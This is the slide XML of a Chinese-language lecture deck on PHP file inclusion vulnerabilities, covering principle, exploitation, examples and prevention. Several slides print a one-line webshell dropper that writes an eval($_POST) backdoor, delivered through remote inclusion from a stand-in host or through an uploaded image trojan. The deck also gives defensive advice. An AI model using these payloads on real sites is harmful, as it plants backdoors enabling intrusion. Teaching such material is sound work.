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2" r:id="rId3"/>
    <p:sldId id="303" r:id="rId4"/>
    <p:sldId id="335" r:id="rId5"/>
    <p:sldId id="358" r:id="rId6"/>
    <p:sldId id="341" r:id="rId7"/>
    <p:sldId id="342" r:id="rId8"/>
    <p:sldId id="359" r:id="rId9"/>
    <p:sldId id="360" r:id="rId10"/>
    <p:sldId id="361" r:id="rId11"/>
    <p:sldId id="362" r:id="rId12"/>
    <p:sldId id="363" r:id="rId13"/>
    <p:sldId id="365" r:id="rId14"/>
    <p:sldId id="366" r:id="rId15"/>
    <p:sldId id="368" r:id="rId16"/>
    <p:sldId id="367" r:id="rId17"/>
    <p:sldId id="357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628" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1"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C8278-D12D-4823-A466-1DC79C55EB4D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5411884D-980D-4B2E-A82A-7DD4695FEA20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文件包含漏洞原理解析</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30065234-9712-443F-9279-C348D61F9FA5}" type="par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43A0069C-C86E-409B-B975-653B85FA5463}" type="sib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9C505637-5ABD-4C1C-A2DD-6ADC05644D9B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文件包含利用</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4FE62B66-E7A0-4F48-9981-10BC8AFCA747}" type="par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4D0CC405-57D2-4953-871A-D28692A6A776}" type="sib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DA6AF6E5-D200-4CAF-9D23-07A82A63D346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文件包含示例</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84D1D317-B61E-4D60-9D98-72B63863EC66}" type="par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3F75B28D-1CDA-495B-9AB6-86136C0FCD99}" type="sib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6D127108-DF03-4877-9955-6C2633C60B98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漏洞防范</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1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94FC2C-5A51-4D8B-9BF8-0C9A7A943DB5}" type="parTrans" cxnId="{CF4EF432-328D-4A50-8B35-8EA44E120E30}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C7A45B9-4B57-4803-9651-5F86E09222AF}" type="sibTrans" cxnId="{CF4EF432-328D-4A50-8B35-8EA44E120E30}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{022C0433-942F-4932-95D7-C7F59F0E311A}" type="pres">
      <dgm:prSet presAssocID="{F31C8278-D12D-4823-A466-1DC79C55EB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DA0F87-1535-40AB-9278-9739A55E7069}" type="pres">
      <dgm:prSet presAssocID="{5411884D-980D-4B2E-A82A-7DD4695FEA20}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D5A585F6-F9CB-44FE-B849-6CAFBE847FC6}" type="pres">
      <dgm:prSet presAssocID="{5411884D-980D-4B2E-A82A-7DD4695FEA2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B4E51A9-54D5-404B-BA68-9AB0868B7BB0}" type="pres">
      <dgm:prSet presAssocID="{5411884D-980D-4B2E-A82A-7DD4695FEA2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BF722-37F6-4977-A1D9-FA7F23B8BDE5}" type="pres">
      <dgm:prSet presAssocID="{5411884D-980D-4B2E-A82A-7DD4695FEA20}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C9CA8BEC-2A1F-4043-A946-228EC802D4C8}" type="pres">
      <dgm:prSet presAssocID="{5411884D-980D-4B2E-A82A-7DD4695FEA20}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AC2E4A44-EC5F-4CC2-9293-24CAA7E9B740}" type="pres">
      <dgm:prSet presAssocID="{43A0069C-C86E-409B-B975-653B85FA5463}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{29C378AB-5A73-471A-930E-8018870990B8}" type="pres">
      <dgm:prSet presAssocID="{DA6AF6E5-D200-4CAF-9D23-07A82A63D346}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6BF284F6-B4CF-41AD-B727-058327CCBBE5}" type="pres">
      <dgm:prSet presAssocID="{DA6AF6E5-D200-4CAF-9D23-07A82A63D34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F6678D0-48D9-4DEC-8659-3089CE6B98EC}" type="pres">
      <dgm:prSet presAssocID="{DA6AF6E5-D200-4CAF-9D23-07A82A63D3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B878E-299D-4E51-BCD1-3ACD118FF60A}" type="pres">
      <dgm:prSet presAssocID="{DA6AF6E5-D200-4CAF-9D23-07A82A63D346}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{56F6496C-A91A-497F-88B8-3BAA979F48E0}" type="pres">
      <dgm:prSet presAssocID="{DA6AF6E5-D200-4CAF-9D23-07A82A63D346}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4311C07A-C05C-4571-BC79-3C3FE758B2C4}" type="pres">
      <dgm:prSet presAssocID="{3F75B28D-1CDA-495B-9AB6-86136C0FCD99}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EA8C5584-BFD2-4988-8298-35D4A5B4341B}" type="pres">
      <dgm:prSet presAssocID="{9C505637-5ABD-4C1C-A2DD-6ADC05644D9B}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{034A669D-A45E-465A-8320-A4264CABDFDE}" type="pres">
      <dgm:prSet presAssocID="{9C505637-5ABD-4C1C-A2DD-6ADC05644D9B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2494911-9929-4822-BA12-3607699E0790}" type="pres">
      <dgm:prSet presAssocID="{9C505637-5ABD-4C1C-A2DD-6ADC05644D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DB06C-1AB0-459C-938C-6AD6B9A99E94}" type="pres">
      <dgm:prSet presAssocID="{9C505637-5ABD-4C1C-A2DD-6ADC05644D9B}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{585C67D2-E3A6-467C-A1DE-20CC608A1562}" type="pres">
      <dgm:prSet presAssocID="{9C505637-5ABD-4C1C-A2DD-6ADC05644D9B}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{939AB88B-0E0F-4E2E-B417-5883B00B47E3}" type="pres">
      <dgm:prSet presAssocID="{4D0CC405-57D2-4953-871A-D28692A6A776}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8AE07C4F-D6FA-4B3B-AB3C-A45C2B78637E}" type="pres">
      <dgm:prSet presAssocID="{6D127108-DF03-4877-9955-6C2633C60B98}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1E392B0D-F115-4254-9AC9-DA4C6BA005F0}" type="pres">
      <dgm:prSet presAssocID="{6D127108-DF03-4877-9955-6C2633C60B98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A1FCB496-EE75-425A-8104-3765FD3CCAE3}" type="pres">
      <dgm:prSet presAssocID="{6D127108-DF03-4877-9955-6C2633C60B9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495011-D6C3-420E-9B83-5A0C747CDC36}" type="pres">
      <dgm:prSet presAssocID="{6D127108-DF03-4877-9955-6C2633C60B98}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4FAD8913-4E23-4696-8F70-4D6BCCDFD0AB}" type="pres">
      <dgm:prSet presAssocID="{6D127108-DF03-4877-9955-6C2633C60B9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5427B88-255D-4C47-88DC-A786E01951E3}" type="presOf" srcId="{DA6AF6E5-D200-4CAF-9D23-07A82A63D346}" destId="{6BF284F6-B4CF-41AD-B727-058327CCBBE5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{174A9816-E955-4D90-AAE3-BF532E579053}" srcId="{F31C8278-D12D-4823-A466-1DC79C55EB4D}" destId="{9C505637-5ABD-4C1C-A2DD-6ADC05644D9B}" srcOrd="2" destOrd="0" parTransId="{4FE62B66-E7A0-4F48-9981-10BC8AFCA747}" sibTransId="{4D0CC405-57D2-4953-871A-D28692A6A776}"/>
    <dgm:cxn modelId="{F4B685CB-61DC-4214-88F5-147B88ED113A}" srcId="{F31C8278-D12D-4823-A466-1DC79C55EB4D}" destId="{5411884D-980D-4B2E-A82A-7DD4695FEA20}" srcOrd="0" destOrd="0" parTransId="{30065234-9712-443F-9279-C348D61F9FA5}" sibTransId="{43A0069C-C86E-409B-B975-653B85FA5463}"/>
    <dgm:cxn modelId="{4F4C9AA8-FDB6-47AF-8A5F-07D951D7C187}" type="presOf" srcId="{F31C8278-D12D-4823-A466-1DC79C55EB4D}" destId="{022C0433-942F-4932-95D7-C7F59F0E311A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A51BF520-F9DF-4A3D-9895-6C34F5425547}" srcId="{F31C8278-D12D-4823-A466-1DC79C55EB4D}" destId="{DA6AF6E5-D200-4CAF-9D23-07A82A63D346}" srcOrd="1" destOrd="0" parTransId="{84D1D317-B61E-4D60-9D98-72B63863EC66}" sibTransId="{3F75B28D-1CDA-495B-9AB6-86136C0FCD99}"/>
    <dgm:cxn modelId="{297506B5-9BD9-4FE9-8588-601BAF10755C}" type="presOf" srcId="{DA6AF6E5-D200-4CAF-9D23-07A82A63D346}" destId="{BF6678D0-48D9-4DEC-8659-3089CE6B98EC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D6FC345B-E676-4EEA-B9B7-A009252F9635}" type="presOf" srcId="{5411884D-980D-4B2E-A82A-7DD4695FEA20}" destId="{8B4E51A9-54D5-404B-BA68-9AB0868B7BB0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F55A5F56-007E-40BD-8152-EBB72B7002E7}" type="presOf" srcId="{6D127108-DF03-4877-9955-6C2633C60B98}" destId="{A1FCB496-EE75-425A-8104-3765FD3CCAE3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{FA536CE6-74F9-42AA-8B43-4725B60B79F6}" type="presOf" srcId="{5411884D-980D-4B2E-A82A-7DD4695FEA20}" destId="{D5A585F6-F9CB-44FE-B849-6CAFBE847FC6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CF4EF432-328D-4A50-8B35-8EA44E120E30}" srcId="{F31C8278-D12D-4823-A466-1DC79C55EB4D}" destId="{6D127108-DF03-4877-9955-6C2633C60B98}" srcOrd="3" destOrd="0" parTransId="{5E94FC2C-5A51-4D8B-9BF8-0C9A7A943DB5}" sibTransId="{0C7A45B9-4B57-4803-9651-5F86E09222AF}"/>
    <dgm:cxn modelId="{54B1D4C9-818A-4E77-921B-367A90A658AC}" type="presOf" srcId="{9C505637-5ABD-4C1C-A2DD-6ADC05644D9B}" destId="{034A669D-A45E-465A-8320-A4264CABDFDE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B432CC88-4CDE-47C0-9D47-9342D26B4F87}" type="presOf" srcId="{6D127108-DF03-4877-9955-6C2633C60B98}" destId="{1E392B0D-F115-4254-9AC9-DA4C6BA005F0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{40B73EA0-E42E-486A-8D65-ABE0C58D39F1}" type="presOf" srcId="{9C505637-5ABD-4C1C-A2DD-6ADC05644D9B}" destId="{D2494911-9929-4822-BA12-3607699E0790}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{12565E2E-4D81-4EBA-BE76-5A3B93C28780}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{7BDA0F87-1535-40AB-9278-9739A55E7069}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C38AC3E0-42E4-4AAF-AE35-CC16A87D2EB9}" type="presParOf" srcId="{7BDA0F87-1535-40AB-9278-9739A55E7069}" destId="{D5A585F6-F9CB-44FE-B849-6CAFBE847FC6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CC202C8E-A7C5-4A9C-BF80-9A3322F854BE}" type="presParOf" srcId="{7BDA0F87-1535-40AB-9278-9739A55E7069}" destId="{8B4E51A9-54D5-404B-BA68-9AB0868B7BB0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{85AB9F57-63C2-4FA6-BCFF-9080A0C86382}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{ECFBF722-37F6-4977-A1D9-FA7F23B8BDE5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F781CCDE-1C88-4A66-9FDC-576B61C93FAA}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{C9CA8BEC-2A1F-4043-A946-228EC802D4C8}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{18268E62-E6B8-4418-BFD7-AFACCAC4C0C2}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{AC2E4A44-EC5F-4CC2-9293-24CAA7E9B740}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B3D90B75-2FCF-4BBB-B669-046BDFB2E881}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{29C378AB-5A73-471A-930E-8018870990B8}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{13470BFA-D2C3-424D-A8D2-27266E40562B}" type="presParOf" srcId="{29C378AB-5A73-471A-930E-8018870990B8}" destId="{6BF284F6-B4CF-41AD-B727-058327CCBBE5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{05869A52-729F-4961-A668-26E46F1FD050}" type="presParOf" srcId="{29C378AB-5A73-471A-930E-8018870990B8}" destId="{BF6678D0-48D9-4DEC-8659-3089CE6B98EC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{AE1EBB58-84BC-4498-9AD3-13A3DF070C07}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{AF1B878E-299D-4E51-BCD1-3ACD118FF60A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A230D7BB-0C1C-4478-A26D-D89B8879A037}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{56F6496C-A91A-497F-88B8-3BAA979F48E0}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{9658953D-C1B2-463A-BCBF-F08C386C42E7}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{4311C07A-C05C-4571-BC79-3C3FE758B2C4}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3DE099E1-86F6-49D2-A0D1-7187418C6312}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{EA8C5584-BFD2-4988-8298-35D4A5B4341B}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{731C773A-0C03-4DED-A152-C1FA1E04AB4A}" type="presParOf" srcId="{EA8C5584-BFD2-4988-8298-35D4A5B4341B}" destId="{034A669D-A45E-465A-8320-A4264CABDFDE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1EC59FBD-3270-466F-A554-B339A60EE74F}" type="presParOf" srcId="{EA8C5584-BFD2-4988-8298-35D4A5B4341B}" destId="{D2494911-9929-4822-BA12-3607699E0790}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{15AB550C-7C86-41E8-ADC5-F67E93462599}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{764DB06C-1AB0-459C-938C-6AD6B9A99E94}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{41A41E33-BB5C-4351-80BC-F67C4EAA4B4B}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{585C67D2-E3A6-467C-A1DE-20CC608A1562}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6F235914-8524-42A9-811D-D895F3F5AF64}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{939AB88B-0E0F-4E2E-B417-5883B00B47E3}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7367A641-3043-489B-AAD5-5C6590593A7E}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{8AE07C4F-D6FA-4B3B-AB3C-A45C2B78637E}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7BD16000-89A0-406D-A989-7A1F62B6EF67}" type="presParOf" srcId="{8AE07C4F-D6FA-4B3B-AB3C-A45C2B78637E}" destId="{1E392B0D-F115-4254-9AC9-DA4C6BA005F0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6F4F2D2E-7294-4B74-BB15-794967191561}" type="presParOf" srcId="{8AE07C4F-D6FA-4B3B-AB3C-A45C2B78637E}" destId="{A1FCB496-EE75-425A-8104-3765FD3CCAE3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{67FE5425-0B9C-4361-8E44-9530D3B00F0C}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{2C495011-D6C3-420E-9B83-5A0C747CDC36}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6A4EFD23-1F87-409C-8E37-5101579F2631}" type="presParOf" srcId="{022C0433-942F-4932-95D7-C7F59F0E311A}" destId="{4FAD8913-4E23-4696-8F70-4D6BCCDFD0A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文件包含漏洞原理解析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文件包含示例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文件包含利用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漏洞防范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8BEC-2A1F-4043-A946-228EC802D4C8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="493643"/>
          <a:ext cx="82073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E51A9-54D5-404B-BA68-9AB0868B7BB0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="410368" y="65603"/>
          <a:ext cx="5745162" cy="8560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文件包含漏洞原理解析</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="452158" y="107393"/>
        <a:ext cx="5661582" cy="772500"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{56F6496C-A91A-497F-88B8-3BAA979F48E0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1809083"/>
          <a:ext cx="82073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78D0-48D9-4DEC-8659-3089CE6B98EC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="410368" y="1381043"/>
          <a:ext cx="5745162" cy="856080"/>
        </a:xfrm>
        <a:prstGeom prst="round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文件包含示例</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="452158" y="1422833"/>
        <a:ext cx="5661582" cy="772500"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{585C67D2-E3A6-467C-A1DE-20CC608A1562}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3124523"/>
          <a:ext cx="82073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4911-9929-4822-BA12-3607699E0790}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="410368" y="2696483"/>
          <a:ext cx="5745162" cy="856080"/>
        </a:xfrm>
        <a:prstGeom prst="round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文件包含利用</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="452158" y="2738273"/>
        <a:ext cx="5661582" cy="772500"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4FAD8913-4E23-4696-8F70-4D6BCCDFD0AB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4439963"/>
          <a:ext cx="82073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CB496-EE75-425A-8104-3765FD3CCAE3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="410368" y="4011923"/>
          <a:ext cx="5745162" cy="85608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漏洞防范</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="120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2158" y="4053713"/>
        <a:ext cx="566158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文件包含漏洞原理解析</a:t>
          </a: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文件包含示例</a:t>
          </a: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85BF-6212-7E47-A2B4-3C05EE0FCECF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0D88-6A2E-E747-9634-F302DB9CD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2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0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3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远程包含：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kumimoji="1" lang="zh-CN" altLang="en-US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endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1100" baseline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allow_url_include</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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得为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN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kumimoji="1" lang="zh-CN" altLang="en-US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默认是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN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allow_url_fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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得为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN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kumimoji="1" lang="zh-CN" altLang="en-US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默认是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN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88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205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746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834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150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3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23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30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09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45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99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远程包含</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1100" baseline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aseline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allow_url_include = On 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100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allow_url_fopen = On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679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95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11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4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0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5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5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3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39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0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7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0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jw\桌面\01 办公系统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211" r="156" b="397"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1364" y="-3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080" y="269895"/>
            <a:ext cx="6768644" cy="147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9.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1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文件包含漏洞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97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读取敏感文件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常见的敏感信息路径如下：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3035030"/>
            <a:ext cx="6857143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9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读取敏感文件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常见的敏感信息路径如下：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51" y="3133825"/>
            <a:ext cx="721904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7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远程包含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SHELL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远程包含一句话木马：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http://test2.com/shell.txt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，代码：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&lt;?fputs(fopen(“shell.php”,”w”),”&lt;?php eval($_POST[a]);?&gt;”)?&gt;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http://test1.com/index.php?id=http://test2.com/shell.txt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，将会在目录下生成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shell.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28161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本地包含配合文件上传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假设已经上传一句话图片木马到服务器中，路径为：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/uploadfile/shell.jpg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图片代码：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&lt;?fputs(fopen(“shell.php”,”w”),”&lt;?php eval($_POST[a]);?&gt;”)?&gt;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http://test1.com/index.php?id=./uploadfile/shell.jpg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，包含这张图片，将会在目录下生成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shell.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33456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本地包含配合文件上传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假设已经上传一句话图片木马到服务器中，路径为：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/uploadfile/shell.jpg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图片代码：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&lt;?fputs(fopen(“shell.php”,”w”),”&lt;?php eval($_POST[a]);?&gt;”)?&gt;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http://test1.com/index.php?id=./uploadfile/shell.jpg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，包含这张图片，将会在目录下生成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shell.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205864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65026786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402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漏洞防范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严格判断包含中的参数是否外部可控，因为文件包含漏洞利用成功与否的关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键点就在于被包含文件是否可以被外部控制。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路径限制：限制被包含的文件只能在某一文件夹内，禁止目录跳转字符，如：“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../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包含文件验证：验证被包含的文件是否是白名单中的一员。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尽量不要使用动态包含，可以在需要包含的页面固定写好，如：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include(“test.php”);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92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思考与要点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en-US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1.PHP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中的四个文件包含函数（</a:t>
            </a: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require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 </a:t>
            </a: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require_once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 </a:t>
            </a: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include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 </a:t>
            </a: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include_once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），因此在挖掘文件包含漏洞时只需要跟踪这四个函数的代码。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US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kumimoji="1" lang="en-US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2.PHP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远程包含漏洞需要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allow_url_include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</a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US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挖掘文件包含漏洞需对代码有一定的基础</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US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kumimoji="1" lang="en-US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文件包含漏洞大部分出现在</a:t>
            </a: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PHP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中，其他的如</a:t>
            </a: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ASP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ASP.NET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JSP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也会存在，但相对很少</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US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kumimoji="1" lang="en-US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5.PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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文件包含漏洞总结 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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http://drops.wooyun.org/tips/3827</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73251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16840071"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="468313" y="1096171"/>
          <a:ext cx="8207375" cy="5236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82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53759328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579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文件包含漏洞原理解析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cs typeface="微软雅黑"/>
              </a:rPr>
              <a:t>开发人员通常会把可重复使用的函数写到单个文件中，在使用某些函数时，直接调用此文件，而无须再次编写，这种调用文件的过程被称为包含。</a:t>
